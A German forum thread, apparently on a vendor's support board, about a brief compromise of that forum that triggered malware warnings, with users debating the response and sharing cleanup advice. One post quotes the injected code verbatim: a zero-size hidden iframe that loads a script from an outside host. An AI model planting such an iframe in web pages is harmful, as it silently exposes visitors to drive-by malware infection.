Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

MBesancon

Administrator
Mitarbeiter
1. Oktober 2010
2.055
187
Erkelenz
AW: Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

Das Problem bestand nur relativ kurze Zeit. Wenn du einen aktuellen Virenscanner auf deinem Rechner hast hat der im Normalfall alle schädlichen Aufrufe unterbunden und dir dann eine entsprechende Warnmeldung ausgegeben. Du kannst gerne einen vollständigen Scan deines Systems durchführen um auf "Nummer Sicher" zu gehen. Sowas schadet nie...
 

ingmar1601

Aktives Mitglied
23. August 2009
106
0
AW: Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

Ok danke für den Hinweis. Aber was genau das Ding gemacht hat wisst Ihr auch nicht oder?
 

testjo

Sehr aktives Mitglied
AW: Marcel mach dies dicht wen nicht so sein soll frage von mir

OK,
Ja pm mach ich eigentlich nie wirklich sorry

jeden sein eigene meinung, war anderes gewöhnt, so etwa von wie, die und das mit so und so und einer sorry und mit link wie zu bereinigen/beheben.
Aber wie gesagt ist OK;)
 

testjo

Sehr aktives Mitglied
AW: Marcel mach dies dicht wen nicht so sein soll frage von mir

Uhm

Denke habe doch Recht, gesehen die viele Beïträge, Antworte, Fragen, unsicherheiten und und.
War einfacher doch für so etwas ein richtige Standard vorgang.

Dan braucht man alles wahrscheinlich nur einmal zu beantworten und erklären also selbst ein Thema anlegen, oben drin, dort alle info, fertig ;)
 

casim

Sehr aktives Mitglied
26. Juni 2012
5.934
9
AW: Marcel mach dies dicht wen nicht so sein soll frage von mir

bohhhh aber es reicht doch 1 Beitrag

wer den lesen will - der liest ihn .... aber man muss doch nicht zig Beiträge aufmachen.

Du kannst doch nicht behaupten, dass das zu MEHR ÜBERSICHTLICHKEIT beiträgt
 

testjo

Sehr aktives Mitglied
AW: Marcel mach dies dicht wen nicht so sein soll frage von mir

Ja das meine ich auch damit, gerade einer, ;)

Aber von / durch JTL mit alle info, und oben ins forum, wo alles klar gesteld werdet, weil dan braucht keiner mehr einer zu öfnen oder weiter fragen/öfnen wen einer zugemacht ist.

Sehe dazu in gegensatz den Fragen und Antworten die es jetzt gibt, was alles nicht nötig gewesen währe wen.

Oja viele auch mein beitrag war zugemacht , teilweis wider offen, und Kunden noch immer mit fragen, deswegen also
 

casim

Sehr aktives Mitglied
26. Juni 2012
5.934
9
AW: Marcel mach dies dicht wen nicht so sein soll frage von mir

sorry ... testjo ... nimms nicht persönlich ... solche Beiträge wie deine sind die, die die Kunden verunsichern

JTL hat es völlig richtig gemacht ... 1 Statement ...

ja es gab kurzfristig einen Befall, Kompromitierung wurde beseitigt, Google wurde um re-Analyse gebeten, Forum ist wieder sauber, wenn "Kunde" eh die Warnmeldung gelesen hat, ist gar nichts passiert, wenn nicht (da das Kundensystem nicht dem aktuellen Stand der Sicherheitstechnik entspricht), dann prüft bitte den PC mit einem aktuellen Viren-Scanner


Schluss ... Aus ... Ende

1 Statemant von JTL und nicht zig Panikmacherei
 

testjo

Sehr aktives Mitglied
AW: Marcel mach dies dicht wen nicht so sein soll frage von mir

Mein Beitrag /Thema war von Sontag also vor al dieser thema's beiträge, und auser dieser weiter nicht. Sehe

( und dort drin dieser dazu: Denke man solllte das dan auch machen bei die Antiviren Programmen, weil so ist einiges momentan durch "den blocker) weil anders bleibt so einiges.
Zusammen mit frage bemerkung notrufnr oder so ;)

Dieser beitrag/thema war weil meiner zugemacht war und die Kunde noch immer unsicher, deswegen mein Frage extra an Marcel, nebenbei waren alle die andere dan noch mit unsicherheiten also fragen in die andere beträge.

Nicht hier, oder durch mich weil dan hat man hier so ein frage gehabt,
Weil hier geht es drüber ob man so etwas besser machen könnte, ist nur Tip vorschlag von einer die in EDV mehr dan 20 jahre aktiv, ist und so mänche Virenbefall bei Firmen und Instanzen ( kleine ud gross) gesehen habe.

Wo man schnell dabei ist , mit alle Info, Tranparanz und und lief alles reibungslos, wo nicht ( meiner erfahrung) waren die Folge nicht so gut

Immerhin meiner meinung dazu.

Wie auch die andere meinung beitrag , ja Kunden werden hier geholfen, ist auch gut.
Dazu habe ich .. las es mal dabei ;)
 

testjo

Sehr aktives Mitglied
AW: Marcel mach dies dicht wen nicht so sein soll frage von mir

Oja sorry mein Deutsch und überhaupt Rechtschreibung passen nicht bei 20 Jahr...
Auch deswegen vielleicht misverständnis, aber dafür / drum rege ich mich nicht auf weil ich bin ja hier in DLD und soll es dan nachbessern wen falsch verstanden kein problem ;)

Ach ja über Kunden kan man sich aufregen, bringt nichts, versuchen die deutlich zu machen es besser zu tun , ja sollte man, auch die noch mit wINDOWS xp SP2 IE6 UND KEIN AKTUELES ANTIVIREN PROGRAMM HABEN, Ja die gibt es noch reichlich.

Unserer ( EDV Personen) aufgabe wen es zufällig geht die zu warnen/hilfen, dan gibt es hoffentlich nacher ein oder mehrere Rechner weniger die die Häcker /Spammer benutzen können, ist auch in Unsere vorteil. ;)

Teilweise kan man auch noch Geld dafür fragen, neuinstall und restore ( wen es ein backup gibt)
 

techno-com

Gut bekanntes Mitglied
20. Januar 2011
476
2
Heilbronn
AW: Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

Dein Beitrag wurde geschlossen weil es bereits mehrere dieser Beiträge gibt. Mit einer Suche nach "Malware" hättest du sofort gesehen das das Problem bekannt und gelöst ist.
In allen Firefox-Warnungen kommt das Wort "Malware" nicht einmal vor. Ich suche immer vor einem Beitrag über die Boardsuche und auch die Google Site-Search, zu dem was die Fehlermeldung ausgegeben hat war hier KEIN einziger Beitrag drin....
Sorry das ich keinen Suchbegriff verwendet habe der hier etwas gefunden hätte zum Thema und sorry das ich "Malware" natürlich nicht gleich eingegeben habe... ich bin mir sicher da du bei Problemen beim TV-Empfang die Schlagwörter "DECT Problem" oder "Frequenztrifft" sofort in einer Suche verwenden würdest um den Fehler einzugrenzen .....

Weiterhin war in den Beiträgen die ich jetzt über Malware gefunden habe das Problem auch schon gelöst als es bei mir noch aufgetreten ist (was ja wohl nicht so war), hast du selbst so geschrieben => http://forum.jtl-software.de/nicht-...r-mac-meldet-malware-im-forum.html#post323465
 

techno-com

Gut bekanntes Mitglied
20. Januar 2011
476
2
Heilbronn
AW: Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

Nachtrag: da auf einmal seit gestern alle Passwörter die hinterlegt waren nur noch mit Sonderzeichen angezeigt wurden habe ich soeben mal einen Virenscan laufen lassen (der Scanner ist immer auch in Echtzeit an !).... Gefunden: AppData/Local/Temp/abcd-bat (Schweregrad: Hoch / Status: Bedrohung: Other:Malware-gen / 27.02.2013)

Gelöscht, PC neu gestartet, alle Passwörter erst mal geändert und jetzt läuft gerade der große Virenscan drüber .......

Soviel also zu "man konnte trotzdem auf die Seite drauf auch mit der Meldung" ..... ich "surfe" hier am PC nicht, ich nutzt nur meine Standard-Seiten ! Daher ist es relativ unwahrscheinlich das ich mir den irgendwo anders eingefangen habe (auch nicht über externe Quellen wie USB-Stift etc.).
 

_simone_

Sehr aktives Mitglied
17. Februar 2013
3.243
457
Emsland
Firma
Notun Delend
AW: Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

uii, das ist ein Backdoor, der speziell Passwörter ausliest. :( Nennt sich auch: "BackDoor.Andromeda.73"

Wie testjo schon schrieb: Java auf die neueste Version bringen, genau so wie das Betriebssystem, Flash und Acrobat Reader. sehr wichtig!

Ich hoffe mal, dass du den Rechener von eine Boot-CD/Stick gestartet hast und von dort den Scanner laufen lässt.
Mit xboot kann man sich gut einen multi-Boot-stick machen, von dem man mehrere Scanner starten kann. z.B. Kapersky Rescue, Avira etc.

NB: Ich hab öfters die Rechner von Kidies bzw. jungen Erwachsenen zu "säubern". Obwohl die sich teilweise vorbildlich beim surfen verhalten, fangen die sich recht häufig was ein, auch ohne ein e-mail-Attach zu öffnen. ;)
 

techno-com

Gut bekanntes Mitglied
20. Januar 2011
476
2
Heilbronn
AW: Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

Java und alles andere ist "up to date" und alte Versionen sind alle deinstalliert ........

Virenscanner läuft in "Echtzeit", ist keine "Standardversion" (Pro-Version) und macht sogar automatisch täglich einen manuellen Suchvorgang auf dem PC.
 

John

Sehr aktives Mitglied
3. März 2012
3.053
670
Berlin
AW: Laut sitecheck ist hier ein iframe aufs forum die da nicht sein soll

Jepp, diesesmal

Code:
<iframe src="[URL="http://forum.jtl-software.de/view-source:http://heroes.pcanywhere.net/in.cgi?9"]http://heroes.pcanywhere.net/in.cgi?9[/URL]"" width="0" height="0" frameborder="0"></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de" id="vbulletin_html"> <head>

Leute, nehmt das Forum OFF, bis das Problem gefunden ist.
 
Ähnliche Themen
Titel Forum Antworten Datum
Das Remotezertifikat ist laut Validierungsverfahren ungültig JTL-Wawi 1.8 0
Neu Beim Retouren anlegen, Retourenposition ist nicht verfügbar Installation / Updates von JTL-Shop 2
Neu Amazon Lister 2.0 - Code 99016 - Ein Maximum von 1 Vorkommen (oder Vorkommnissen) ist für das Attribut color zulässig Amazon-Lister - Fehler und Bugs 0
Neu Amazon Lister 2.0 ...ist erforderlich, wird aber nicht bereitgestellt. Amazon-Lister - Fehler und Bugs 2
Neu Upload Modul - ist nicht rückgängig zu machen Allgemeine Fragen zu JTL-Shop 3
Neu Abholung mit DHL: Ist das immer so schlimm? User helfen Usern 5
Neu Probleme mit Varianten dann Stückliste und beim Hinzufügen ist dann schluss JTL-Wawi - Fehler und Bugs 7
Neu Es ist nicht mehr möglich Artiekl bei eBay einzustellen Code 240 und Code 21920203 eBay-Anbindung - Fehler und Bugs 2
Neu Stornierte Aufträge werden mit "Ist bezahlt" JA gekennzeichnet JTL-Wawi - Ideen, Lob und Kritik 21
Gelöst Gibt es einen Cash-Recycler der kompatibel ist? Allgemeine Fragen zu JTL-POS 2
Neu Was ist eine Sinnvolle Artikelverwaltung bei Kleinteilen? User helfen Usern 2
In Diskussion Custom Workflows nur noch für Premiumkunden - unsinnige Einschränkung, die keine ist JTL-Workflows - Ideen, Lob und Kritik 4
Neu Wo ist die "Konto-Prüfen-Fuinktion"? Amazon-Anbindung - Fehler und Bugs 1
Neu eazyAuction: nicht laufendes Ebay-Angebot "Wieder einstellen" ist ausgegraut User helfen Usern 0
Neu Auftragsimport -> Artikel im Listing leer / falscher Wert Ist bezahlt JTL-Ameise - Fehler und Bugs 0
In Diskussion Welches Sumup Kartenterminal ist am unproblematischsten mit LTL-Pos? JTL-POS - Fragen zu Hardware 10
Wawi 1.9 ist nun noch stärker an den Vorgaben der GoBD ausgerichtet JTL-Wawi 1.9 11
Neu Anzeige ickl. Mwst obwohl Kune IGL ist und netto Preise hat Allgemeine Fragen zu JTL-Shop 4
Neu Auftrag->Eigene Übersichten Anzeigen lassen in welchem Lager ist wieviel Bestand. Eigene Übersichten in der JTL-Wawi 2
Neu WF: Aufträge nicht zusammenfassen, wenn der erste älter ist User helfen Usern - Fragen zu JTL-Wawi 2
Neu /admin/cache lädt 20s für leere/defekte Statistik UND der Shop ist 0.3s langsamer - Zusammenhang? JTL-Shop - Fehler und Bugs 4
Neu Das angegebene Land ist nicht gültig JTL-ShippingLabels - Fehler und Bugs 76
Neu Aktualisierung konnte nicht durchgeführt werden. Fehlercode 8 - Der Installationsknoten ist nicht vorhanden. Gelöste Themen in diesem Bereich 4
Artikel in Aufträgen - ist aber nicht! JTL-Wawi 1.8 1
Neu Ist die Wawi 1.8 tatsächlich nicht GoBD konform? Arbeitsabläufe in JTL-Wawi 19
Neu Ist das möglich: Einmal Lieferung und monatliche Bezahlung (Miete)? User helfen Usern - Fragen zu JTL-Wawi 1
Neu ist ein Multichannel Versand eines FBM-Auftrages möglich Amazon-Anbindung - Fehler und Bugs 2
Neu amazon / Ein Fehler ist aufgetreten, bitte beim JTL-Support melden JTL-Wawi - Fehler und Bugs 295
Neu Mediendateien sind nach Update im Shop 5.3.2 nicht mehr zum Download verfügbar, wenn das Format .* (.zip) ist JTL-Shop - Fehler und Bugs 2

Ähnliche Themen